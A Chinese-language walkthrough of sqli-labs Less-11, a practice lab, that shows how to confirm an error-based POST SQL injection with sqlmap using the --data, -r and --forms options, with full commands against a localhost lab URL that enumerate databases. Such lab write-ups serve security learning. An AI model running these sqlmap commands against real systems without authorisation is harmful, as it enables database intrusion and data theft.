sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)

sqli-labs less11 基于错误的POST型单引号字符型注入


一、知识储备

针对post型的表单,sqlmap有三种参数可验证:
–data 需要自己手工找到参数名以及一些信息
-r 需要自己抓包
–forms sqlmap中的自动抓包获取参数,最方便

二、验证漏洞

首先打开less11;
sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)
提交任意数据,用burp抓包;
sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)
记下post请求参数;uname=1111&passwd=11111&submit=Submit

这里介绍三种方法去检验该漏洞,满足一种证明该漏洞基本存在。

方法一:–data

找到需要提交的post参数,输入下面命令,–dbs枚举所有数据库名称;

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --data="uname=1111&passwd=11111&submit=Submit" --dbs

sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)

方法二:-r

将提交的报文抓包后,把信息存储在一个txt文件中,输入下面命令,–dbs枚举所有数据库名称;

python sqlmap.py -r 文件路径+文件名.txt  --dbs

sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)

方法三:–forms

利用该命令,使sqlmap自己抓包,输入下面命令,–dbs枚举所有数据库名称

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --forms --level=5 --dbs

sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)
sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)
这时证明该漏洞确实存在。

上一篇:sqli-labs初学(一):联合查询注入less-1&less-2


下一篇:sql-labs继续闯关 5~10